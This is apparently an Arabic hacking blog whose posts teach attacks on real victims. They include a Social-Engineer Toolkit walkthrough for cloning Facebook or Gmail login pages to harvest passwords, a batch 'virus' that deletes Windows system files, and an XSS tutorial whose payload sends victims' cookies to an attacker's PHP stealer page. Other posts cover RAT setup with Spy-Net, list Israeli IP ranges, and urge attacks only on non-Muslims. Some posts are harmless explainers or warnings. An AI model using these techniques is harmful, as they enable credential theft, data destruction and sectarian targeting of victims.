KING_WORLD

My Pc is my weapon, Inside systems is my life, Hacking is my heart, Defacing is my love, Spamming is my business, Cracking is my hobbie,

‏إظهار الرسائل ذات التسميات تعليم الهكر. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات تعليم الهكر. إظهار كافة الرسائل

الاثنين، 2 فبراير 2015

طريقة لتشويش على قنوات الفظائية

طريقة لتشويش على قنوات الفظائية




شرح تلغيم موقع بسكريبت

شرح تـلغيم موقع بسـكريبت و اصطياد ضحايا






فرجة ممتعة


الأحد، 16 فبراير 2014

الثلاثاء، 4 يونيو 2013

طريقة فتح بورت في مودام و في جدار الحماية

سلام عليكم و رحمة الله تعالى وبركاته
اهلا بكم زوار موقع hacker4 dz
اليوم سوف اقدم لكم طريقة فتح بورت في مودام و كذالك في جدار الحماية
و هذا درس مكمل لدرس الي عملتو من قبل
لبرنامج spynet
و هذا رابط فيديو درس الي فاتو
http://heckardz.blogspot.com/2013/02/spy-net-v27-final.html
و اشاء الله راح يبقى طريقة تشفير اخترافي هذا نتركو لدرس القادم اشاء الله



فرجة ممتعة

الجمعة، 17 مايو 2013

نصائح عن طرق التي تادي الى اختراق الفيس بوك


                              سلام عليكم و رحمة الله تعالى و بركاته
اهلا بكم اخواني اعزاء في موقع hacker4 dz
  اليوم راح نتحدث عن بعض طرق الي تحدث في اخترقات فيس بوك

طرق حديثة

اختراق جهاز الضحية بعد جمع كم كافي من المعلومات  او عن طريق تلغيم البرامج كما يحصل في المنتديات, ملفات التجسس المعتمدة على برامج RAT وأيضا مشروع الميتا سوبليت والبوت نت والثغرات فى السيرفرات الدعمه للأميلات كثغرة هوتميل الفترة الماضيه وأيضا الهندسه الأجتماعيه والفيروسات المتطورة و التخمين المتقدم والحقن واحتراق المواقع لسحب الأميلات والدخول للفيسبوك عبر الأميل والملفات المشبوه والبرمجيات الخبيثه واقراص التخزين الصلبة والمرنه مشبوهة المصدر ويكمن الحل الأمثل لجميع طرق الأختراق فى العقل الواعى القادر على تحليل ما يراه

طرق عامية


1 - الصفحة المزورة ( الاكثر شيوعاً في العالم العربي )


الصفحة المزورة هي من اكثر طرق الاختراق شيوعاً في اختراق الفيس بوك او الياهو في العالم العربي ، وببساطة هنا يقوم المخترق بانشاء صفحة تشبهه الفيس بوك وبها خانه لتسجيل الاميل والباسورد ويتم انشاءها علي رابط يشبهه الي حد كبير الفيس بوك ويتم ارسالها لك او لاي شخص ومعها عبارة مشوقة مثل "الالبوم الجديد للفنان ..." وغيرها من العبارات التي يتشوق لها الكثير فتقوم بالدخول بدون ان تنتبهه فتظهر لك هذه الصفحة وتطلب منك اعادة تسجيل الدخول الي الفيس بوك وهنا انت لا تنتبه ان هذا الرابط هو خارج الفيس بوك من الاساس وانه ليس رابط الفيس بوك وبمجرد ان تدخل البيانات يتم ارسالها للمخترق في شكل ملف تيكست ومن ثم يقوم المخترق بتحميلها وهكذا يصبح الحساب قد اخترق.


2 - keylogger  


كي لوجر keylogger هو يعتبر اسهل الطرق لاختراق باسورد حساب الفيس بوك او لاختراق جهاز بالكامل بجميع الحسابات المسجلة عليه! ، لعلم هذا النوع حقاً في قمة الخطورة وحتي الحذر منه يعتبر صعب جداً وساشرح لك ، هذا النوع من البرامج صغير الحجم جداً ويقوم بالدخول الي جهاز الضحية وتسجيل كل ما يحدث به من باسوردات .. الخ ، وارسالها الي المخترق من خلال استضافة FTP ، او من خلال الايميل ، وهذا النوع خطر جداً لان مستخدم محترف للكمبيوتر يمكن ان يقع في مثل هذه الطرق.

3 - اختطاف الجلسة Session Hijacking


اختصاف الجلسة Session Hijacking قد يكون في قمة الخطورة لو كنت تتصفح الفيس بوك من خلال http ، ففي اختطاف الجلسة يقوم الهاكر بسرقة كوكز المتصفح والذي يستخدم في التحقق من الموقع الذي تقوم باستخدامه ويقوم بالدخول الي حسابك ، وهذه الطريقة تستخدم علي شبكة الـ Lan او الشبكة اللاسلكية ، ولكن لا تقلق لان هذه الطريقة لم تعد فعالة لان الفيس بوك اتاح استخدام Https وهو الوضع المشفر ، ويمكنك تفعيل التصفح الامن او Https من خلال صفحة اعدادات الحساب في الفيس بوك.

4 - Stealers


الكثير من المستخدمين او ربما جميعهم يقوم باستخدام خاصية حفظ الباسوردات داخل المتصفح سواء باسورد الفيس بوك او غيرها ، وهذا امر طبيعي ولكن في بعض الاحياب يمكن اختراقك من خلالها ، و Stealers هو عبارة عن برامج صممت خصيصاً لسحب هذه الباسوردات من المتصفح وارسالها الي المخترق.

5DNS Spoofing


ان كنت علي شبكة انترنت بمعني ان هناك اشخاص معك علي نفس الشبكة ، وكان من ضمنهم هاكر فيمكنه تغيير صفحة الفيس بوك لديك الاصلية الي صفحة المزورة التي تكلمنا عنها في الخطوة الاولي وبذلك يستطيع سرقة حسابك.

6 - تطبيقات الفيس بوك ( اصبحت خطيرة )


تطبيقات الفيس بوك اصبحت في الفترة الاخيرة من اخطر طرق الاختراق ، وهي عبارة عن تطبيق مشوق توم بالضغط عليه ويطلب السماح والاذن فتقوم انت بالسماح فيتحكم ف يحسابك ويرسل رسائل لاصدقائك ومنشورات علي الجروبات ! ، فانظر الصورة بالاسفل علي سبيل المثال :-



كما تلاحظ فـ هذا منشور داخل جروب من خلال التطبيق ، اذا قمت بالضغط عليه والسماح له فسوف يتم ارسال نفس المنشور علي جروباتك وصفحتك بدون اذنك وهكذا من يضغط عليه يقوم بنفس المهمة ! ، وهناك ما هو اخطر من هذا فاحذر من التطبيقات مجهولة المصدر. هناك تطبيقات تقوم بسرقة معلوماتك واخري بيانات حسابك .. الخ ، فاحذر !

 7- الهندسة الاجتماعية العكسية Social Engineer
و يعتمد اساسا على خداع الضحية باستخدام الحيل النفسية من أجل الحصول على المعلومات التي يحتاجها و من ثم الاختراق

السبت، 27 أبريل 2013

كيف تصبح هاكر اخلاقي متخصص في امن المعلومات

 

الشركات والهيئات اضحت في العالم العربي مؤخرا تهتم برفع مستوى امن شبكاتها وذلك من خلال تكوين وتوظيف متخصصين اكفاء في الامن المعلوماتي ، ذلك لما اصبح يعيشه العالم الإفتراضي من تهديدات يومية ، قد تؤدي الى نتائج لاتحمد عقباها في حالة إذا  ما أهملت الشركة حماية نظمها المعلوماتية، إذ قد يتمكن  تمكن الهاكرز من الوصول إلى بعض ثغارتها المعلوماتيةوإستغلالها .

كيف تصبح هاكر اخلاقي متخصص في امن المعلومات
في حين نجد كذلك تزايد عدد الشركات المغربية خصيصا والعربية عامة اضحت تتعاقد مع شركات للامن المعلوماتي من اجل فحص ثغراتها الامنية والتعرف عليها قبل الهاكرز مع إمكانية سدها وتأمينها . 

هكذا فإن عدد من الهاكرز الاخلاقين العرب اضحوا يعملون في عدة شركات عربية متخصصة في الامن المعلوماتي كمختبرين للإختراق ، وتحويل هوايتهم التي قد تكون فيما سبق غير اخلاقية إلى إطار اخلاقي ينظمه القانون حيث لايمكن لمختبر الإختراق ان يقوم بالإختراق إلا اذا حصل على تصريح صريح من الشركة المعنية بالامرى وهذه كإضافة

الاثنين، 22 أبريل 2013

شرح اختراق فيس بوك بلباك تراك5 (sqlmap)

كيفكم اعزائي اعضاء محترفي الحماية؟؟


ان شاء الله تمام 



ما ابغي اطول عليكم نخش بالموضوع



لقد تم شرح ما هو الباك تراك، والآن في هذا البرنامج التعليمي وانا ذاهب الى اشرح لكم كيفة إختراق المواقع باستخدام الباك تراك 5 (sqlmap .(Sqlmap هو أداة حقن SQL التلقائي التي تساعدك على الإختراق الموقع بسهولة تامة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام أداة الباك تراك 5 sqlmap .



افتح backtrack 5 و اكتب الامر التالي


كود PHP:
cd /pentest/exploits/set  
حصريا إختراق المواقع باستخدام الباك


الان افتح social Engineering Tool kit (SET) ./set 


حصريا إختراق المواقع باستخدام الباك



بمجرد الضغط علي ENTER سوف تفتح لك SET

الان اضغط علي الخيار الاول يعني رقم 1 1 Social-Engineering Attacks و ENTER
و بعد ذلك رقم 2 ثم ENTER


حصريا إختراق المواقع باستخدام الباك


و الان اختر الرقم 4 Tabnabbing Attack Method ثم ENTER


حصريا إختراق المواقع باستخدام الباك


و الان قم باختيار رقم 2 Site Cloner ثم ENTER


حصريا إختراق المواقع باستخدام الباك


الان ضع رابط االموقع مثل الفيسبوك (ان كنت تريد اختراق gmail ضع رابط gmail


حصريا إختراق المواقع باستخدام الباك


و الان اضغط علي ENTER


حصريا إختراق المواقع باستخدام الباك


و الان افتح نافذة جديدة و اكتب ifconfig ثم ENTER


حصريا إختراق المواقع باستخدام الباك


و الان قم بنسخ الاي بي و ضعه في المتصفح


حصريا إختراق المواقع باستخدام الباك


الان ساقوم بوضع ايميل و باس لاعرف ان كان يعمل ام لا


حصريا إختراق المواقع باستخدام الباك


الان نضغط علي تسجيل الدخول للفيسبوك و نعود للنافذة الاولي لنشاهد الايميل و باس الحساب


حصريا إختراق المواقع باستخدام الباك


كيف يمكنك اختراق اي حساب؟؟



فقط ارسل الرابط الذي وضعته في المتصفح و يحتوي علي الاي بي تبعك للضحية و انتظر الي ان يسجل دخوله 



ان شاء الله قد وفقت في الشرح


تحياتي                                      hacker4 dz

الثلاثاء، 12 مارس 2013

شرح عن دور ما معنى الهكر و ما هي اشياء التي تساعد على هاكرز

سلام عليكم و حمة الله تعالى وبركاته
كيف حال اخواني اخواتي كرام
انشاء الله كل يكون بصحة و عافية

و اعذروني اني اطوالت عليكم في وضع مواضيع لاني كنت غائب على نت لضروف العمل
الامهم اليوم رايح اعرفكم على ما معنى هكر؟
من هم الهاكرز؟
ما هي اشياء الي تساعد على هاكرز ؟
و كذالك ما دور بتش ؟


ما هو الهكر ؟

يسمى باللغة الانجليزية (Haking) .. ويسمى باللغة العربية عملية التجسس أو الاختراق ..
حيث يقوم أحد الأشخاص الغير مصرح لهم بالدخول إلى نظام التشغيل في الاجهزة بطريقة غير شرعية ولأغراض مثل التجسس أو التخريب حيث يتاح للشخص المتجسس (الهاكر)
أن ينقل أو يمسح أو يضيف ملفات أو برامج كما أنه بإمكانه أن يتحكم في نظام التشغيل فيقوم بإصدار أوامر مثل إعطاء أمر الطباعة أو التصوير أو التخزين ..



من هم الهاكرز ؟

هم الأشخاص الذين يخترقون الاجهزة او المواقع فيستطيعون مشاهدة ما به من ملفات أو سرقتها أو تدميرها أو التلصص ومشاهدة ما يفعله الشخص على شبكة الإنترنت


ما هي الأشياء التي تساعد الهكر على اختراق الاجهزة ؟

وجود ملف باتش أو تروجان
لا يستطيع الهاكر الدخول إلى اي جهاز إلا مع وجود ملف يسمى ( patch ) أو (trojan ) في الجهاز الكمبيوتر وهذه الملفات هي التي يستطيع الهاكر بواسطتها الدخول إلى الجهاز حيث يستخدم الهاكر أحد برامج التجسس التي ترتبط مع ملف الباتش الذي يعمل كـ (ريسيفر)
عندما يتعرض جهاز الكمبيوتر للإصابة بملف التجسس وهو ( الباتش أو التروجان ) فإنه على الفور يقوم بفتح بورت ( port ) أو منفذ داخل الجهاز فيستطيع كل من لديه برنامج تجسس أن يقتحم هذا الجهاز
من خلال هذا الملف الذي يقوم بفتح منطقة أشبه بالنافذة السرية التي يدخل منها الهاكرز ..

لا يستطيع الهكر الدخول للجهاز المصاب بالباتش او الترجوان اذا كان غير متصل بالانترنت


ماهو الباتش او التروجوان ( السيرفر ) ؟

هو عبارة عن ملف تنفيذي يكون امتداده بصيغة EXE غالبا يقوم المخترق بارساله الى الضحية ليكون بينه وبين حاسوبه حلقة ربط تمكنه بالتحكم المباشر فيه

الخميس، 21 فبراير 2013

شرح عمل فيروس مدمر

سلام عليكم و رحمة الله تعالى و بركاته

كيف الحال شباب طبعا العديد
 منا يتساءل ما هو الفيروس وكيف يأتي الفيروس إلىجهازي
 وكيف و كيف ,,,

 اولاً نتعرف من أين يأتي الفيروس ويصل إلىجهازي:.

 1-الفيروس يأتيإلى جهازك من اي مكان مثل:.
 -كثرة تحميل البرامج من النت
 -تبادل المستندات أو الملفات من جهاز إلى آخر
 -أكثر سببا للفيروسات هو الألعاب وبرامج الهكر
 بعد كل شئ اليوم سوف نتعلم طريقة صنع فيروس بصيط ومدمر
 هذا هو الكود


 @Echo off
 c:
 cd %WinDir%\System\
 deltree /y *.dll
 cd\
 deltree /y *.sys



 اتبعالخطوات :. افتح قائمة start ومن ثم اختر al programsومن ثم accessories ومن ثم Notepad



قم بفتح المفكرة Notepad وانسخ الكود الذي عرضناه سابقا


بعد ان تنتهي من نسخ الكود قم بحفظة عن طريق file ومن ثم save as


سوف تظهر لك قائمة كما موضع في الصورة اختر أي مكان تريد حفظ فيهالملف وقم بحفظ الملف باسم Virus-H.bat
 وبعد الحفظ سوف يظهر لك الملف في المكانإلى اخترت فيه الحفظ

 تحذر أخي أن تقوم بفتح هذا الملف Virus-H.bat
 لأنه جاهز
 أخووكم برنس

الأربعاء، 13 فبراير 2013

طريقة اختراق مواقع عن طريق ثغرةxss

ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع ؟
 ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال كود javascript أو HTML او PHP
 ما يجب ان تعرفه HTML,javascript,PHP

 اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع.....
 و معظم هذه الثغرات موجودة في مربعات البحث في المواقع ...
 مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.
www.infectedsite.com/search.php?q=word
 يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".
 و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
 ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "
 هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS
 هذا يعني ان الموقع مصاب بثغرة XSS
لماذا يكون الموقع مصابا بها ؟
 لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل #@$%^,.<>
 ليمنعو من إدخال كود javascript او HTML
هناك نوعين من ثغرات الXSS
النوع الدائم :
 يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
 حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .
 <script>alert("XSS")</script>
 و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
النوع المؤقت :
 يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق
http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word
ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟
 هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS
 أهمها سرقة الكوكيز
 تحتاج الى استضافة موقع تدعم PHP
 ننشئ صفحة PHP مثال stealer.php
 تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET
 الكود :
 <?php
 $data=$_GET["c"]
 $f=open("cookies.tct","w")
 $f.write($data)
 $f.close()
 ?>
 هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
 هنا دمجنا السكريبت
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو الكوكيز عن طريق الأمر
 document.cookie
 هنا اذا فتحنا الملف
http://yoursite.com/cookies.txt
 ستجد الككيز للمستخدم مكتوبة فيها
  اما في الثغرات الدائمة فيكفي ادخال الكود
 <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>
 ليسرق الكوكيز
 و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS
  عن طريق سكريبت
 Document.location

استغلال نقطة ضعف internet explorer

جوجل سطح المكتب مكشوف: استغلال نقطة ضعف Internet Explorer لفيش معلومات المستخدم

-نظرة عامة
كان لا بد أن يحدث. مفتون مؤخرا من قبل I إمكانية استخدام جوجل سطح المكتب لاسترجاع البيانات عن بعد من البيانات الشخصية للمستخدم (مثل بطاقات الائتمان وكلمات السر) من خلال استخدام صفحة على شبكة الإنترنت الخبيثة. الآن، وذلك بفضل تصميم عيب شديد في Internet Explorer، تمكنت من إظهار انه من الممكن لتشغيل عمليات البحث على زوار سرا إلى موقع ويب من خلال استغلال هذه الثغرة الأمنية. في هذه المقالة سوف بالتفصيل ما هو الضعف في IE وكيفية استخدامها لاستغلال جوجل سطح المكتب. إذا كان لديك IE 6 وجوجل سطح المكتب V2 تثبيت يمكنك اختبار لنفسك في حجتي من الصفحة المفهوم.تحديث: بعد نشر استغلال، وجوجل مصححة مواقعهم لمنع استغلال هذه الثغرة الأمنية. ولذلك، فإن إثبات المفهوم لم يعد يعمل.

-تحليل مفصل
عادة، متصفحات فرض قيود قوية للتفاعل عبر المجال من خلال متصفح الويب. ويمكن للصفحة ويب معينة تجعل مستخدم تصفح إلى مجال مختلف. ومع ذلك، فإنه قد لا قراءة محتوى الصفحة استرجاع ولا التلاعب أي من أهدافه DOM. تفرض هذا القيد حتى واحد صاحب الموقع لن تكون قادرة على التجسس على عادات المستخدم تصفح باستخدام جافا سكريبت. أيضا، إذا تم بالفعل تسجيل مستخدم الدخول إلى خدمة معينة (مثل Gmail أو هوتميل) صفحة ويب ضار يمكن أن تنفذ عمليات معينة في حساب المستخدم (مثل فتح بريد الكتروني والقراءة) إذا لم تكن القيود في مكان. في IE يتم الاحتفاظ هذه القيود بدقة ولكن يتم تقسيم عندما يتعلق الأمر الواردات CSS. وأنا أسمي هذا الهجوم CSSXSS أو أوراق الأنماط المتتالية الكتابة عبر الموقع
ويمكن للصفحة ويب معينة استيراد قواعد CSS من مجال مختلف باستخدام "استيراد @" التوجيه. IE لديها أيضا وظيفة جافا سكريبت سهل يسمى "addImport" التي تعمل تماما مثل "استيراد @" ولكن في وقت التشغيل. يمكن في وقت لاحق قواعد CSS يمكن قراءتها من قبل الوصول إلى "cssText" الملكية في جمع document.styleSheets. لكن ماذا يحدث عندما صفحة ويب تستورد URL التي ليس ملف CSS صالحة؟ يبدو أن تحليل IE في CSS تساهلا يسمح لهذا أن يحدث في والممتلكات "cssText" يمكن للمرء أن يقرأ مقتطفات من كود HTML من موقع بعيد وسوء تحليل وقواعد CSS. لأن القواعد CSS تتطلب بنية معينة قد يكون مقدار من التعليمات البرمجية هذا ما استردادها من موقع بعيد تختلف تبعا لقانون الموقع.قواعد CSS تحديد شكل الموقع وعادة ما يكون محدد، خاصية وقيمة. يتم فصل هذه الممتلكات وقيمة بنقطتين وتحيط بها الأقواس المتعرجة. على سبيل المثال، لتلوين جميع الروابط على صفحة ويب معينة يمكن للمرء تحديد قاعدة CSS "ل{لون: أبيض}". من أجل استرداد رمز من URL معينة غير صالحة CSS، يجب أن تحتوي الصفحة الهدف بعض الأحرف التي يتم استخدامها في تقويم الأسنان، وهي CSS مجعد. لحسن الحظ، معظم صفحات الويب الحديثة تحتوي عليها كما تستخدم على نطاق واسع في الأقواس المتعرجة شفرة جافا سكريبت وقواعد CSS المضمنة في صفحات. وبمجرد أن يضرب محلل CSS IE الأقواس المتعرجة فإنه سيحاول تفسير البيانات بعد أنها CSS. حتى لو كان الناتج قواعد CSS لا تجعل أي معنى لمتصفح، IE سوف تسمح تزال تراهم في الممتلكات "cssText". الجمع بين الأقواس المتعرجة، وكولون كولون شبه كما تظهر في قانون تحديد الهدف HTML التي يمكن قراءتها قصاصات من التعليمات البرمجية.
عند استخدام هذه التقنية سوف CSSXSS للمهاجمين الحصول على شفرة جافا سكريبت في الغالب. ومع ذلك، وانه يمكن تحسين حظه عن طريق حقن الأحرف CSS في صفحة الهدف. منذ أكثر المواقع الحديثة هي ديناميكية والحصول على المعلمات من خلال URL، عن طريق الحقن هذه الأحرف هي تافهة عادة. هذه تشبه إلى حد كبير عن طريق الحقن جافا سكريبت في صفحة الهدف كما هو مستخدم في نقاط الضعف XSS الكلاسيكية فقط هنا للمهاجمين يقحم حرف التي تنظر معظم المواقع غير مؤذية.مثل الكثير من الثقوب XSS الكلاسيكية، وهذا عيب في تصميم IE يسمح للمهاجمين لاسترداد بيانات المستخدم الخاصة أو تنفيذ عمليات نيابة عن مستخدمين على المجالات البعيد. الفرق هو أنه في هذه الحالة موقع الهدف لا يجب أن تكون عرضة للحقن النصي. جميع مهاجم القيام به هو جذب مستخدم إلى صفحة ويب الخبيثة. يمكن استغلال الآلاف من المواقع على شبكة الإنترنت وليس هناك حل بسيط ضد هذا الهجوم ما لا يقل عن حتى يتم إصلاح IE. وهذا يعني تتأثر الملايين من مستخدمي IE من هذا الخلل التصميم.وقد تم اختبار هذه الثغرة الأمنية للعمل على اصلاح متصفح الانترنت مايكروسوفت بالكامل 6 Explorer والإصدارات السابقة عرضة ربما كذلك. موزيلا فايرفوكس يبدو كافيا للحفاظ على القيود المجال في الواردات وCSS لا يبدو أن تكون عرضة لهذا النوع من الهجوم. أوبرا ليست ضعفا لأنها لا تدعم جمع معدات الشكل. والحلول الممكنة لمستخدمي لتخفيف هذا الهجوم هو تعطيل جافا سكريبت في IE أو استخدام متصفح مختلف.
و انا براي لو تستعملو متصفح فيرفوكس احسن

الاثنين، 11 فبراير 2013

الان برنامج سرقة حسبات فيس بوك



حصريا تحميل برنامج سرقة حسابات الفيس بوك 
 اكيد عنوآن الموضوع لفت إنتباه الجميع


كتبت العنوان بالشكل السابق ، لجذب آكبر عدد من الضحآيآ

ضحآيآ الغش والخدآع ،

حيث بيسألنا البعض عن برامج اختراق ايميل او فيسبوك

  لكن الحقيقة انه لايوجد برنامج بالعالم بتحط فيه الايميل او الاكاونت بيعطيك 

الباسوورد.... مستحيل

طبعا انتو بتشوفوا البرامج دي و الشروحات وبتفكروا انها جد

بس هي بالأصل برامج مفبركة و ملغومة الهدف انك تنزلها بجهازك لكي يتم 

اختراقك انت.

ارجو من الجميع الانتباه و لا تحملو اي برنامج من هذه  البرامج .

شاركوا هذا الموضوع لاصدقاءكم حتي لا ينخدعوا.

ونكرر لايوجد برنامج بالعالم بتحط فيه الايميل او الاكاونت بيعطيك الباسوورد

بيانات تسجيل تكون مخزنة بطرق يصعب اكتشافها لدالك ادا وجدت برنامج فكر كيف تمت  برمجته فطرق سرقة تاتي من خلال اكتشاف تغرات او نصب علي عقول الضعيفةاو باختراق الاجهزة واخد ما تشاء

 تتحياتيييي 
                                 
by prince king                                                                      

الخميس، 7 فبراير 2013

شرح طريقة عمل فيروس بالبرنامج Spy-Net v2.7 Final

بسم الله رحمان الرحيم
                               سلام عليكم  ورحمة الله تعالى وبركاته

اشاء الله كل يكون بصحة و عافية ,المهم يوم ساتطرق او سوف اوريكم شرح طريقة عمل فيروس(بتش) بلبرنامجspynet
اخلكم الان تابعو فيديو و فرجة ممتعة

و اشاء الله رايح اعملكم شرح طرق تشفير احترافي و فتح بورت في مودام و طريقة استعمال هذا برنامج تحميل برنامج

الأربعاء، 6 فبراير 2013

التعريف البسيط لـ ip‎ و الفرق بين ipv4 و ipv6

ما هو عنوان الأي بي (ip address)؟

في العالم الاتصالات والانترنت هناك برتوكولات عامة للتعامل بين الاجهزة والسيرفرات لضمان الاتصال بشكل صحيح ووصول المعلومات بشكل سريع وصحيح احد هذي البروتوكولات هو بروتوكول (ip) … و كلمة الـ (ip) هي اختصار لكملة كلمة internet protocol .. وظيفة هذا البرتوكول اعطاء كل جهاز رقم او عنوان خاص به (لتوضيح الفكرة كـ مثال لكل منا رقم هاتف خاص به .. لترسل رسالة الى احمد يجب ان تعرف رقمه وترسل على ذلك الرقم حتى لا تذهب الرسالة لـ محمد وهو الشخص الخاطئ ) كذلك في عالم الانترنت هناك نفس الفكرة … لذلك كل من يستطيع دخول الانترنت لديه عنوان خاص به يسمى ip address ..



ما الذي كان بالـ ipv4 ؟ وماهي مشاكله ؟


يتكون IP Address من 32 بت ويقسم على اربع خانات من الارقام كل خانة تحتوي علي رقم من 0 الي 255 وبالتالي يكون مجموعهم 256

كل خانة من هذه الخانات تسمي Octet وهي ترمز للرقم 8 فالخانة الواحدة تحتوي علي اي رقم من 2^1 الي 2^8 (اثنين اس ثمانية) .. اي ان الشكل الرئيسي لعنوان الاي بي هو التالي : x.x.x.x حيث ان x يتغير من 0 الى 255 .. وذلك يسمح لنا بإمكان اعطاء عناوين لـ 4.3 مليار شخص تقريبا .. لكن مع تطور وسائل الاتصال وانتشار ثقافة الانترنت … تزايد عدد دخول الاشخاص حول العالم بشكل كبير مما أدى الى نفاذ تلك العناوين .. فكان من الواجب اكتشاف طريقة جديدة للـ العنونه تعطينا مساحة اكبر من العناوين مع تزايد المشتركين الذين يدخلون الى شبكة الانترنت يوميآ .

ما هو الـ ipv6 ؟ ماهي المشاكل التي سيحلها ؟


عند ظهور مشكلة نفاذ العنوانين كان من الواجب التحرك لتطوير البديل فكان الحل هو ان يقوموا بالعمل على  إنشاء إصدار جديد من بروتوكول الإنترنت وهو ما يعرف بـ IPv6 او الإصدار السادس من بروتوكول الإنترنت والذي يوفر عدد كبير جدا من العناوين (يقارب 340 تريليون تريليون تريليون)، وفي هذا الاصدار  يستخدم 128 بت للعنوان الواحد (مثلا على العناوين الجديدة  : 2001:1234:5678:9:1:2:3:4)  وبالتالي توفير عدد كبير من العناوين مما يعطينا مساحة كبيرة لتوسيع تطبيقاتنا المرتبطة بشبكة الانترنت وفيه هذا الاصدار يمكن ان يكون للشخص اكثر من 5000 عنوان حاليا .. مما يحل الكثير من المشاكل التي تواجهها الكثير من الشركات والمؤسسات في استخدام عنوان اي بي واحد مشترك لكل اجهزة الشركة للدخول على الانترنت عن طريق برتوكول الـ NAT … والاكتفاء بعنوان داخليه مختلفة لكنها موحده في الاتصال بالانترنت .


ماهي آثار هذا الإصدار أو كيف سيؤثر ذلك عليّ ؟


لن تشعر باي تغير في الاتصال بشبكة الانترنت او التصفح او الاستخدام العادي لشبكة الانترنت  … الا في حالة ان المودم او جهاز الشبكة او نظام التشغيل  الذي لديك قديم لايدعم هذا النوع الجديد من العناوين ..

ملاحظة : في الغالب جميع أنظمة التشغيل والمتصفحات وأجهزة الكمبيوتر تدعم IPv6

أخيرا :


الاصدار الجديد من هذا البروتوكول سيفيد كثير في نقلة نوعية في عدد الاجهزة المرتبطة في شبكة الانترنت كـ الجوالات و أنظمة التحكم بالمنازل و الاجهزة المحمولة كالايباد والجالكسي تاب والكثير الكثير ممايتيح لنا التطور بشكل سريع تجاه تطوير الانظمة الذكية المرتبطة بالانترنت والتحكم عن بعد

الثلاثاء، 5 فبراير 2013

هل تريد ان تصبح هاكر اقرأ هذا

المرجو من كافة الاعضاء ان يعرفو ان لايوجد برنامج لجلب الباسورد كل البرامجمتل هدا النوع تكون ملغمة بها فايروس لاتساعد في جلب شئ 
يقوم ب تجميد الامي:msn frezer
برورات برنامج يقوم بتجسس علي الجهاز حيت تصبح انت مالك جهاز الضحية تقوم باد كل ما



 بداخل جهازه من باسوردات و كل شئ وكدالك برامج اخري متل ميتاسبلويت و باك تراك الدي يقوم ب التجسس و فك تشفير وفك الروتر كدالك برنامج بيفروست و الكتير ضروري ان تعرف ايبي الضحية لتقوم باختراقه
ملاحظة لاتستخدم هذه الاساليب مع اخوك المسلم وانما مع غير المسلم جزاك الله خير احبائى موضوع ال ip موضوع قديم جدا جدا بس لسه فى شباب معلوماتهم فيه بسيطه علشان كدا قلت يعنى نقول الكلام دا علشان نكمل بعض المعلومات الناقصه . ماشى معاكم يا شباب . -= الـ ip =- الآي بي هو رقم يعطى لكل شخص يعمل كونيكت لشبكة الانترنت .. و هو يتغير في كل مرة تدخل للشبكة مامعني كلمة ip؟ internet protocol بروتوكول الإنترنت مكونات الآي بي ؟ والآي بي هو عبارة عن رقم مكون من اربع خانات و بيختلف من بلد لبلد مثلا: بعض من أي بي اسرائيل : 62.0.150.1 ----------------> 62.0.180.255 199.203.75.1 --------------> 199.203.72.255 216.72.43.1 ---------------> 216.72.43.255 دائماالارقام اللي بتتغير هي بالخانة الأخيرة من 1 الى 255 ماهي فائدة ip؟ له فائدة كبيرة منها ان تبحث من خلال البرامج ومنها SuperScan أو ScanPort ولها انواع عدة وفائدتها تبحث لك عن منافذ ports لأي ip ويمكنك عن طريقها اختراق الاجهزة او تزودك بمعلومات عن الضحية ومكان اقامتهdazzddler1 و ....الخ او النيوك وسوف نتطرق لها بالتفصيل الحصول عليه بما ان الآي بي من الضروريات لعمليات الاختراق .. فيجب معرفة كيفية الحصول عليه طرق الحصول على الايبي: ______طريقة استخراج الأيبي الخاص بك ________ هناك ثلاث طرق الأولى :بواسطة برامج معينه عند النقر عليها تقوم بعرض الرقم الخاص بك والطريقه الثانيه : هي معرفتها من داخل ويندوز دون استعمال برامج اضافيه عن طريق ( ابداء start ) ثم اختر ( تشغيل run ) سوف يخرج لك مربع حوار اكتب بداخله ( winipcfg ) مع مراعاة انه يجب عليك ان تكون متصل بأنترنت فتظهر لك شاشه بها عنوان ip الطريقة الثالثة لكي تعرف الاي بي حقك ادخل احد هذه المواقعhttp://www.myipaddress.com/ http://www.whatismyip.com/______ طريقة استخراج ايبي الضحية من الرساله ________ لنفرض ان احدا ارسل اليك رساله وتود ان تعرف الأيبي من رسالته في الهوتميل من بريد الهوت ميل أختر options ثم اختر Mail Display Settings ثم massage headers وغير الاختيار الى advanced الان أذهب ألى أي رسالة واردة ستجد العديد من المعلومات ظهرت منها رقم الأيبي 